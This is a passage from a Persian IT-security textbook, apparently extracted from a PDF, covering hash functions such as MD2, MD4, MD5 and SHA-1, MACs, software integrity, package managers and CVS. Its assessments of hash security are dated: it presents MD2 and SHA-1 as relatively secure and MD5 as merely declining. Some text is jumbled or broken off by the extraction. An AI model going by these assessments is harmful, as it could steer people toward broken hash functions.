ﺝ( ﺍﮔﺮ ﻳﻚ ﻓﺎﻳﻞ ﻭﺭﻭﺩﻱ ﻭ ﺧﻼﺻﻪﭘﻴﺎﻡ ﻣﺘﻨﺎﻇﺮ ﺁﻧﺮﺍ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﻢ ،ﺍﺯ ﻧﻈﺮ ﻣﺤﺎﺳﺒﺎﺗﻲ ﻧﺒﺎﻳﺪ ﺗﻮﺍﻧﺴﺖ ﻓﺎﻳﻞ ﺩﻳﮕﺮﻱ ﺑﺎ ﻣﻘﺪﺍﺭ ﺧﻼﺻﻪﭘﻴﺎﻡ
ﻣﺸﺎﺑﻪ ﭘﻴﺪﺍ ﻛﺮﺩ.
ﺍﺯ ﻟﺤﺎﻅ ﻧﻈﺮﻱ ﺩﻭ ﻓﺎﻳﻞ ﻣﺘﻔﺎﻭﺕ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﻘﺪﺍﺭ ﺧﻼﺻﻪﭘﻴﺎﻡ ﻣﺸﺎﺑﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ .ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺗﻼﻗﻲ ١٠٣ﻧﺎﻡ ﺩﺍﺭﺩ .ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﻳـﻚ ﺗـﺎﺑﻊ
ﺧﻼﺻﻪﭘﻴﺎﻡ ﺍﻳﻤﻦ ﺑﺎﺷﺪ ،ﻻﺯﻡ ﺍﺳﺖ ﺍﺯ ﻧﻈﺮ ﻣﺤﺎﺳﺒﺎﺗﻲ ﭘﻴﺪﺍ ﻛﺮﺩﻥ ﻳﺎ ﺗﻮﻟﻴﺪ ﺍﻳﻦ ﺗﻼﻗﻲﻫﺎ ﻋﻤﻠﻲ ﻧﺒﺎﺷﺪ.
ﻼ ﭼﻨﺪ ﻧﻤﻮﻧﻪ ﺫﻛﺮ ﺷﺪﻩ ﺍﺳﺖ:
ﺗﻮﺍﺑﻊ ﺧﻼﺻﻪﭘﻴﺎﻡ ﺑﺴﻴﺎﺭﻱ ﺍﺭﺍﺋﻪ ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﻫﻢ ﺍﻛﻨﻮﻥ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ .ﺫﻳ ﹰ
MD2
١٠٤
ﺗﺎﺑﻊ ﺧﻼﺻﻪﭘﻴﺎﻡ ﺷﻤﺎﺭﺓ ،۲ﺗﻮﺳﻂ ﺭﻭﻟﻨﺪ ﺭﻳﻮﺳﺖ ﭘﺪﻳﺪ ﺁﻣﺪ .ﺍﻳﻦ ﺗﺎﺑﻊ ﺧﻼﺻﻪﭘﻴﺎﻡ ﺩﺭ ﻣﻴﺎﻥ ﺗﻮﺍﺑﻊ ﺧﻼﺻﻪﭘﻴﺎﻡ ﺍﻳﻤﻦﺗﺮﻳﻦ ﺗـﺎﺑﻊ ﺭﻳﻮﺳـﺖ
ﺍﺳﺖ ،ﺍﻣﺎ ﻣﺤﺎﺳﺒﺎﺗﺶ ﻧﻴﺰ ﺑﻴﺸﺘﺮﻳﻦ ﺯﻣﺎﻥ ﺭﺍ ﻣﻲﮔﻴﺮﺩ .ﺩﺭﻧﺘﻴﺠﻪ MD2ﺑﻨﺪﺭﺕ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣـﻲﮔﻴـﺮﺩ MD2 .ﻳـﻚ ﺧﻼﺻـﺔ ۱۲۸
ﺑﻴﺘﻲ ﺗﻮﻟﻴﺪ ﻣﻲﻛﻨﺪ.
MD4
"ﺧﻼﺻﻪﭘﻴﺎﻡ ﺷﻤﺎﺭﺓ "۴ﻫﻢ ﺗﻮﺳﻂ ﺭﻭﻟﻨﺪ ﺭﻳﻮﺳﺖ ﭘﺪﻳﺪ ﺁﻣﺪ .ﺍﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺧﻼﺻﻪﭘﻴﺎﻡ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺟﺎﻳﮕﺰﻳﻦ ﺳﺮﻳﻌﺘﺮ ﺑـﺮﺍﻱ MD2ﺍﺑـﺪﺍﻉ
ﺷﺪ .ﻣﺘﻌﺎﻗﺒﹰﺎ ﻧﺸﺎﻥ ﺩﺍﺩﻩ ﺷﺪ ﻛﻪ MD4ﻧﻘﺎﻁ ﺿﻌﻒ ﺑﺎﻟﻘﻮﻩ ﺩﺍﺭﺩ .ﻳﻌﻨﻲ ﺍﻳﻦ ﺍﺣﺘﻤﺎﻝ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻓﺎﻳﻠﻲ ﭘﻴﺪﺍ ﺷﻮﺩ ﻛﻪ MD4ﻣـﺸﺎﺑﻬﻲ ﺑـﺎ
ﻳﻚ ﻓﺎﻳﻞ ﺩﺍﺩﻩ ﺷﺪﻩ ﺗﻮﻟﻴﺪ ﻛﻨﺪ ،ﺑﺪﻭﻥ ﺍﻳﻨﻜﻪ ﻧﻴﺎﺯ ﺑﻪ ﺟﺴﺘﺠﻮﻱ brute forceﺑﺎﺷﺪ )ﻛﻪ ﺍﻟﺒﺘﻪ ﺑﻪ ﻫﻤﺎﻥ ﺩﻟﻴﻞ ﻛﻪ ﺟـﺴﺘﺠﻮ ﺩﺭ ﻓـﻀﺎﻱ ﻛﻠﻴـﺪ ۱۲۸
ﺑﻴﺘﻲ ﻋﻤﻠﻲ ﻧﻴﺴﺖ ،ﺟﺴﺘﺠﻮﻱ brute forceﻫﻢ ﻋﻤﻠﻲ ﻧﻤﻲﺑﺎﺷﺪ( MD4 .ﻧﻴﺰ ﻳﻚ ﺧﻼﺻﺔ ۱۲۸ﺑﻴﺘﻲ ﺗﻮﻟﻴﺪ ﻣﻲﻛﻨﺪ.
MD5
"ﺧﻼﺻﻪﭘﻴﺎﻡ ﺷﻤﺎﺭﻩ "۵ﻧﻴﺰ ﺗﻮﺳﻂ ﺭﻭﻟﻨﺪ ﺭﻳﻮﺳﺖ ﭘﺪﻳﺪ ﺁﻣﺪ ،MD5 .ﺍﺻﻼﺡ ﺷﺪﺓ MD4ﺍﺳﺖ ﻛﻪ ﺍﺯ ﺗﻜﻨﻴﻜﻬﺎﻳﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻩ ﻛـﻪ ﺑـﺮﺍﻱ
ﺍﻳﻤﻦﺗﺮ ﻛﺮﺩﻥ ﺁﻥ ﻃﺮﺍﺣﻲ ﺷﺪﻩﺍﻧﺪ .ﺍﮔﺮﭼﻪ ﺍﺯ MD5ﺑﻪ ﻭﻓﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ ،ﺩﺭ ﺗﺎﺑﺴﺘﺎﻥ ۱۹۹۶ﭼﻨﺪ ﻧﻘﺺ ﺩﺭ ﺁﻥ ﻛﺸﻒ ﺷﺪ ﻛﻪ ﻣﻮﺟﺐ
ﺷﺪ ﮔﻮﻧﻪﻫﺎﺋﻲ ﺍﺯ ﺗﻼﻗﻲﻫﺎ ﺭﺍ ﺑﺘﻮﺍﻥ ﺩﺭ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺿﻌﻴﻒﺷﺪﺓ ﺁﻥ ﻣﺤﺎﺳﺒﻪ ﻛﺮﺩ .ﺩﺭﻧﺘﻴﺠﻪ MD5ﺁﺭﺍﻡ ﺁﺭﺍﻡ ﺭﻭﺍﺝ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺩﺳﺖ ﻣـﻲﺩﻫـﺪ.
ﺍﺯ ﻫﺮﺩﻭﻱ MD5ﻭ SHA-1ﺩﺭ ﻓﻨﺎﻭﺭﻱ SSLﻭ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺍﺳﺘﻔﺎﺩﻩ ﺷﺪﻩ ﺍﺳﺖ MD5 .ﻧﻴﺰ ﻳﻚ ﺧﻼﺻﻪ ۱۲۸ﺑﻴﺘﻲ
ﺗﻮﻟﻴﺪ ﻣﻲﻛﻨﺪ.
SHA
ﺍﻟﮕﻮﺭﻳﺘﻢ hashﺍﻳﻤﻦ ،١٠٥ﻣﺮﺗﺒﻂ ﺑﺎ MD4ﻣﻲﺑﺎﺷﺪ ﻭ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻫﻤـﺮﺍﻩ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ ﺍﻣـﻀﺎﻱ ﺩﻳﺠﻴﺘـﺎﻟﻲ ﻣﺆﺳـﺴﺔ ﻣﻠـﻲ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ ﻭ
ﻓﻨﺎﻭﺭﻱ ) (NIST's DSSﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺍﺳﺖ .ﻣﺪﺕ ﻛﻮﺗﺎﻫﻲ ﺑﻌﺪ ﺍﺯ ﺍﻧﺘﺸﺎﺭ NIST ،SHAﺍﻋﻼﻡ ﻛﺮﺩ ﻛﻪ SHAﺑﺪﻭﻥ ﻳﻚ ﺗﻐﻴﻴﺮ ﻛﻮﭼﻚ
ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻨﺎﺳﺐ ﻧﻴﺴﺖ SHA .ﻳﻚ ﺧﻼﺻﺔ ۱۶۰ﺑﻴﺘﻲ ﺗﻮﻟﻴﺪ ﻣﻲﻛﻨﺪ.
SHA-1
ﺍﻟﮕﻮﺭﻳﺘﻢ " hashﺍﻳﻤﻦ ﺍﺻﻼﺡ ﺷﺪﻩ" ﻧﺴﺒﺖ ﺑﻪ SHAﻛﻤﻲ ﺗﻐﻴﻴﺮ ﻛﺮﺩﻩ ﺍﺳﺖ .ﺑﺮﺍﻱ ﻋﻤﻮﻡ ﺩﺍﻧﺴﺘﻪ ﻧﻴﺴﺖ ﻛﻪ ﺁﻳﺎ ﺍﻳﻦ ﺗﻐﻴﻴـﺮﺍﺕ SHA-1
ﺭﺍ ﻧﺴﺒﺖ ﺑﻪ SHAﺍﻳﻤﻦﺗﺮ ﻣﻲﻛﻨﺪ ﻳﺎ ﻧﻪ ،ﺍﻣﺎ ﻋﺪﺓ ﺯﻳﺎﺩﻱ ﺑﺮ ﺍﻳﻦ ﺑﺎﻭﺭﻧﺪ ﻛﻪ ﭼﻨﻴﻦ ﻣﻲﻛﻨﺪ SHA-1 .ﻫﻢ ﻳﻚ ﺧﻼﺻﺔ ۱۶۰ﺑﻴﺘـﻲ ﺗﻮﻟﻴـﺪ
ﻣﻲﻛﻨﺪ.
103 Collision
104 Message Digest #2
105 Secure Hash Algorithm
٢٩٩ ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﺗﻮﺍﺑﻊ ﺧﻼﺻﻪﭘﻴﺎﻡ ﺑﺪﻟﻴﻞ ﻭﻳﮋﮔﻴﻬﺎﻳﺸﺎﻥ ﺑﺨﺶ ﻣﻬﻤﻲ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺍﻣﺮﻭﺯﻱ ﻧﻴﺰ ﻫﺴﺘﻨﺪ .ﺧﻼﺻﻪﭘﻴﺎﻣﻬـﺎ ﻣﺒﻨـﺎﻱ
ﺍﻏﻠﺐ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻣﻲﺑﺎﺷﻨﺪ .ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﻣﺮﻭﺯﻱ ﺗﺼﺮﻳﺢ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺑﺠﺎﻱ ﻛـﻞ ﺳـﻨﺪ ﻛـﺎﻓﻲ
ﺍﺳﺖ ﺧﻼﺻﻪﭘﻴﺎﻡ ﺳﻨﺪ ﺍﻣﻀﺎ ﺷﻮﺩ.
ﺧﻼﺻﻪﭘﻴﺎﻣﻬﺎ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﺁﺳﺎﻧﻲ ﺑﺮﺍﻱ ﺗﻜﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﭘﻴﺎﻡ ﻛـﻪ ﻳـﻚ ﺭﻣـﺰ ﻣـﺸﺘﺮﻙ ﺑـﻴﻦ ﺩﻭ ﻃـﺮﻑ ﺍﺭﺗﺒـﺎﻁ
ﻣﻲﺑﺎﺷﻨﺪ ﻭ ﺗﺄﻳﻴﺪ ﭘﻴﺎﻡ ﺭﺍ ﺛﺎﺑﺖ ﻣﻲﻛﻨﻨﺪ ﺑﻜﺎﺭ ﺭﻭﻧﺪMAC .ﻫﺎ ﺑﻪ ﺍﻧﺘﻬﺎﻱ ﭘﻴﺎﻣﻲ ﻛﻪ ﺑﺎﻳﺪ ﺗﺄﻳﻴﺪ ﺻﺤﺖ ﺷﻮﺩ ﺿﻤﻴﻤﻪ ﻣﻲﺷـﻮﻧﺪ ) RFCﺷـﻤﺎﺭﺓ
٢١٠٤ﭼﮕﻮﻧﮕﻲ ﻛﺎﺭﺑﺮﺩ ﺩﺭﻫﻢﺭﻳﺰﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﻛﻠﻴﺪ ﺑﺮﺍﻱ ﺗﺄﻳﻴﺪ ﺻﺤﺖ ﭘﻴﺎﻡ ﺭﺍ ﺷﺮﺡ ﻣﻲﺩﻫﺪ(MAC .ﻫﺎﺋﻲ ﻛﻪ ﺑﺮ ﭘﺎﻳـﺔ ﺧﻼﺻـﻪﭘﻴﺎﻣﻬـﺎ ﻫـﺴﺘﻨﺪ ﺍﻣﻨﻴـﺖ
ﺑﻴﺸﺘﺮﻱ ﺑﺮﺍﻱ ﺭﻣﺰﻧﮕﺎﺭﻱ ﭘﺮﻭﺗﻜﻠﻬﺎﻱ ﻣﺴﻴﺮﻳﺎﺑﻲ ﺍﻳﻨﺘﺮﻧﺖ ﻓﺮﺍﻫﻢ ﻣﻲﺳﺎﺯﻧﺪ.
ﺣﻔﻆ ﻳﻜﭙﺎﺭﭼﮕﻲ
ﺣﻔﻆ ﻳﻜﭙﺎﺭﭼﮕﻲ ﻭ ﺻﺤﺖ ﺍﻃﻼﻋﺎﺕ ﺫﺧﻴﺮﻩﺷﺪﻩ ﺩﺭ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺍﻣﻨﻴﺖ ﻛﻠﻲ ﻭ ﺍﻧﺠﺎﻡ ﻋﻤﻠﻴﺎﺕ ﻗﺎﺑﻞ ﺍﻋﺘﻤﺎﺩ ﺣﻴﺎﺗﻲ ﺍﺳﺖ .ﺷـﻤﺎ
ﺑﺎﻳﺪ ﺍﺯ ﻳﻜﭙﺎﺭﭼﮕﻲ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ،ﻳﻜﭙﺎﺭﭼﮕﻲ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ ،ﻭ ﻳﻜﭙـﺎﺭﭼﮕﻲ ﺩﺍﺩﻩﻫﺎﻳﺘـﺎﻥ ﺍﻃﻤﻴﻨـﺎﻥ ﺣﺎﺻـﻞ ﻛﻨﻴـﺪ .ﺩﺭﺧـﺼﻮﺹ
ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ،ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻧﻪﺗﻨﻬﺎ ﻣﺴﺘﻠﺰﻡ ﻧﻈﺎﺭﺕ ﺑﺮﺍﻱ ﺗﻐﻴﻴﺮﺍﺕ ﻧﺎﺧﻮﺍﺳﺘﻪ ﺩﺭ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺷﻤﺎ ﺍﺳﺖ ،ﺑﻠﻜﻪ ﻫﻤﭽﻨـﻴﻦ
ﺑﺨﺶ ﭘﻨﺠﻢ
ﺍﻋﻤﺎﻝ ﻭﺻﻠﻪﻫﺎ ﻭ ﺍﺻﻼﺣﺎﺕ ﺍﻣﻨﻴﺘﻲ ﻻﺯﻡ ﺑﺮﺍﻱ ﺣﻔﻆ ﺍﻳﻤﻨﻲ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺭﺍ ﻧﻴﺰ ﺷﺎﻣﻞ ﻣﻲﺷﻮﺩ.
108 Metadata
٣٠١ ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﻣﺪﻳﺮﻳﺖ ﺑﺴﺘﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺗﻨﻬﺎ ﻣﺨﺼﻮﺹ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺗﺠﺎﺭﻱ ﻧﻴﺴﺖ .ﺗﻮﺯﻳﻌﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ Unixﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺁﺯﺍﺩ ﻧﻴـﺰ ﺳﻴـﺴﺘﻤﻬﺎﻱ
ﻣﺪﻳﺮﻳﺖ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﻨﺪ ﺗﺎ ﺑﻪﺭﻭﺯ ﻧﮕﻬﺪﺍﺭﻱ ﺳﻴﺴﺘﻢ ﺭﺍ ﺑﺮﺍﻱ ﺭﺍﻫﺒﺮﺍﻥ ﺳﺎﺩﻩﺗﺮ ﻛﻨﻨﺪ .ﭼﻨـﺪﻳﻦ ﺗﻮﺯﻳـﻊ ﻣﺒﺘﻨـﻲ ﺑـﺮ ،Linuxﺳﻴـﺴﺘﻢ
ﻣﺪﻳﺮﻳﺖ ﺑﺴﺘﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ١٠٩RPMﺭﺍ ﺑﺮﮔﺰﻳﺪﻩﺍﻧﺪ .ﺍﻳﻦ ﺳﻴﺴﺘﻢ ﺍﺯ ﻳﻚ ﻓﺮﻣﺎﻥ rpmﺑﺮﺍﻱ ﺗﻤﺎﻡ ﻛﺎﺭﻫﺎﻱ ﻣﺪﻳﺮﻳﺘﻲ ﺑﺴﺘﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺧﻮﺩ
ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ Debian GNU/Linux .ﺍﺯ ﻳﻚ ﺳﻴـﺴﺘﻢ ﻣـﺪﻳﺮﻳﺖ ﺑـﺴﺘﻪ ﻧـﺮﻡﺍﻓـﺰﺍﺭﻱ ﺟـﺎﻳﮕﺰﻳﻦ ﺑﻨـﺎﻡ dpkgﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨـﺪ.
ﺳﻴﺴﺘﻤﻬﺎﻱ Unixﻣﺒﺘﻨﻲ ﺑﺮ BSDﺭﻭﻱ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﺘﻦ ١١٠ﺗﻤﺮﻛﺰ ﺩﺍﺭﻧﺪ ،ﺍﻣﺎ ﺩﺭ ﻋﻴﻦ ﺣـﺎﻝ ﻣﺠﻤﻮﻋـﻪﺍﻱ ﺍﺯ ﺑـﺴﺘﻪﻫـﺎﻱ
ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺍﺯ ﭘﻴﺶ ﺗﺮﺟﻤﻪﺷﺪﻩ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺑﻮﺳﻴﻠﺔ ﻓﺮﺍﻣﻴﻦ ،pkg_delete ،pkg_addﻭ pkg_infoﺍﺩﺍﺭﻩ ﻣﻲﺷﻮﻧﺪ.
ﺗﻮﻟﻴﺪ ﻧﺴﺨﺔ ﺟﺪﻳﺪ ﻣﻨﺠﺮ ﺷﻮﺩ .ﺑﺮﻧﺎﻣﻪ diffﺍﻳﻦ ﻓﺎﻳﻠﻬﺎ ﺭﺍ ﺗﻮﻟﻴﺪ ﻣﻲﻛﻨﺪ ،ﻭ ﺑﺮﻧﺎﻣﺔ ﺍﺻﻼﺣﻲ ﺑﺮﺍﻱ ﺍﻋﻤﺎﻝ ﺁﻧﻬﺎ ﺑﻪ ﻧﺴﺨﻪ ﻗﺪﻳﻤﻲ ﺍﺳﺖ ﺗـﺎ ﺑـﺎ
ﺍﻧﺠﺎﻡ ﺷﺪﻥ ﻋﻤﻞ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ،ﻧﺴﺨﺔ ﺟﺪﻳﺪ ﺍﻳﺠﺎﺩ ﺷﻮﺩ .ﺑﻌﺪ ﺍﺯ ﺍﺻﻼﺡ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ،ﺭﺍﻫﺒﺮ ﺳﻴﺴﺘﻢ ﺑﺮﻧﺎﻣﺔ ﻛﺎﺭﺑﺮﺩﻱ ﺭﺍ ﺗﺮﺟﻤﻪ ﻛﺮﺩﻩ ﻭ ﺁﻧﺮﺍ
ﻣﺠﺪﺩﹰﺍ ﻧﺼﺐ ﻣﻲﻧﻤﺎﻳﺪ.
ﺑﺮﺍﻱ ﻣﺜﺎﻝ Free BSDﻭ ﻧﺴﺨﻪﻫﺎﻱ Unixﻣﺮﺗﺒﻂ ﺑﺎ ﺁﻥ ﺑﺮﻧﺎﻣﻪﻫـﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ ﻓﺮﺍﻭﺍﻧـﻲ ﺭﺍ ﺩﺭ ﻣﺠﻤﻮﻋـﻪ portﻫـﺎﻱ ﺧـﻮﺩ ﻣﻨﺘـﺸﺮ
ﻣﻲﻛﻨﻨﺪ .ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﻛﺎﺭﺑﺮﺩﻱ ﺍﺯ ﻣﺘﻦ ﺑﺮﻧﺎﻣﺔ ﺍﺻﻠﻲ ﻧﻮﺷﺘﻪ ﺷﺪﻩ ﻭ ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﺍﺻﻼﺡﻫﺎﻳﻲ ﻛﻪ ﺍﻋﻤﺎﻝ ﺷﺪﻩﺍﻧﺪ ﺗﺎ ﻳﻜﭙﺎﺭﭼﻪﺳﺎﺯﻱ ﺑﺮﻧﺎﻣﻪ
ﻛﺎﺭﺑﺮﺩﻱ ﺭﺍ ﺩﺭ ﻣﺤﻴﻂ BSDﺑﻬﺒﻮﺩ ﺑﺨﺸﻨﺪ ﺗﺸﻜﻴﻞ ﻣﻲﺷﻮﺩ .ﻓﺎﻳﻠﻬﺎﻱ ﻗﺎﺑﻞ ﺗﺮﺟﻤﻪ ،ﺑﺮﻧﺎﻣﺔ ﻛﺎﺭﺑﺮﺩﻱ ﺭﺍ ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ ﻣﻲﺳـﺎﺯﻧﺪ ،ﺁﻧـﺮﺍ
ﻧﺼﺐ ﻣﻲﻛﻨﻨﺪ ،ﻭ ﺳﭙﺲ ﻓﺎﻳﻠﻬﺎﻱ ﺑﺮﻧﺎﻣﻪ ﻛﺎﺭﺑﺮﺩﻱ ﺭﺍ ﺑﺎ ﻓﺮﻣﺎﻥ BSDﻣﺮﺑﻮﻃﻪ ) (pkg_oddﺛﺒﺖ ﻣﻲﻧﻤﺎﻳﻨﺪ .ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ FreeBSD
ﺑﺮﺍﻱ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺷﺨﺺ ﺛﺎﻟﺚ ﺍﺯ ﺍﻳﻦ ﺭﻭﺵ ﺑﻪ ﻣﻴﺰﺍﻥ ﻭﺳﻴﻌﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ.
CVS
١١١
ﺭﻭﺵ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺑﺮﺍﻱ ﻣﺪﻳﺮﻳﺖ ﻣﺘﻦ ،ﺫﺧﻴﺮﻩﺳﺎﺯﻱ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺩﺭ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺳﻴﺴﺘﻢ ﮐﻨﺘﺮﻝ ﻧﺴﺨﻪ ﻣـﺘﻦ
ﺑﺮﻧﺎﻣﻪ ﻣﺜﻞ ﺳﻴﺴﺘﻢ ﻧﺴﺨﻪﻫﺎﻱ ﻫﻤﺰﻣﺎﻥ ) ١١٢،(CVSﻭ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﺮﺍﻱ ﺍﺟﺎﺯﻩ ﺩﺍﺩﻥ ﺑﻪ ﺑﺮﻗﺮﺍﺭﻱ ﺍﺗﺼﺎﻻﺕ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ
ﻧﺎﺷﻨﺎﺱ ﺍﺳﺖ .ﻛﺎﺭﺑﺮﺍﻧﻲ ﻛﻪ ﻣﻲﺧﻮﺍﻫﻨﺪ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺧﻮﺩ ﺭﺍ ﺗﺎ ﺁﺧﺮﻳﻦ ﺑﺮﻭﻧﺪﺍﺩ ﺑﻪﺭﻭﺯ ﻛﻨﻨﺪ ﺑﺮﺍﻱ ﺑﺮﺭﺳﻲ ﻧﻬﺎﻳﻲ ﺁﺧﺮﻳﻦ ﻧﺴﺨﺔ ﺍﺻﻼﺡﺷـﺪﻩ
ﺍﺯ ﺑﺮﻧﺎﻣﻪ CVSﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﻭ ﺑﻌﺪ ﺍﺯ ﺁﻥ ﻣﺘﻦ ﺑﻪﺭﻭﺯ ﺩﺭﺁﻣﺪﻩ ﻣﻲﺗﻮﺍﻧﺪ ﺗﺮﺟﻤﻪ ﻭ ﻧﺼﺐ ﺷﻮﺩ.
،NetBSD ،FreeBSDﻭ OpenBSDﺑﺮﺍﻱ ﺍﻧﺘﺸﺎﺭ ﻭ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺮﻛﺰﻱ ﺳﻴـﺴﺘﻢﻋﺎﻣﻠﻬـﺎﻱ ﺧـﻮﺩ ﺍﺯ CVSﺍﺳـﺘﻔﺎﺩﻩ
ﻣﻲﻛﻨﻨﺪ .ﻋﻼﻭﻩ ﺑﺮ ﺁﻥ ﺩﻫﻬﺎ ﻫﺰﺍﺭ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺘﻦﺑﺎﺯ ﺍﺯ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ CVSﻣﺮﺑﻮﻁ ﺑﻪ ﺧﻮﺩ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣـﻲﻛﻨﻨـﺪ ﻳـﺎ ﺩﺭ ﭘﺎﻳﮕﺎﻫﻬـﺎﻳﻲ
ﻣﺜﻞ sourceforge.netﻛﻪ ﻣﺨﺎﺯﻥ CVSﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﻨﺪ ﻣﻴﺰﺑﺎﻧﻲ ﻣﻲﺷﻮﻧﺪ .ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻣﺮﺟـﻊ ﺧـﻮﺏ CVSﻣـﻲﺗـﻮﺍﻥ ﺑـﻪ ﻛﺘـﺎﺏ
"ﺿﺮﻭﺭﻳﺎﺕ (Essential CVS) "CVSﺍﺷﺎﺭﻩ ﮐﺮﺩ ﻛﻪ ﺗﻮﺳﻂ ﺍﻧﺘﺸﺎﺭﺍﺕ ﺍﻭﺭﻳﻠﻲ ﻭ ﺷﺮﻛﺎ ﺑﻪ ﭼﺎﭖ ﺭﺳﻴﺪﻩ ﺍﺳﺖ.
ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺍﻧﻌﻜﺎﺳﻲ ﺑﺪﻟﻴﻞ ﺍﻓﺰﺍﻳﺶ ﺩﺍﺩﻥ ﻣﻴﺰﺍﻥ ﺩﺭ ﺩﺳﺘﺮﺱ ﺑﻮﺩﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ ١١٤ﺍﺯ ﻃﺮﻳﻖ ﺗﻜﺮﺍﺭ ،ﻳﻚ ﻣﺰﻳـﺖ ﻣﻬـﻢ ﺍﻣﻨﻴﺘـﻲ ﺑـﻪ ﺣـﺴﺎﺏ
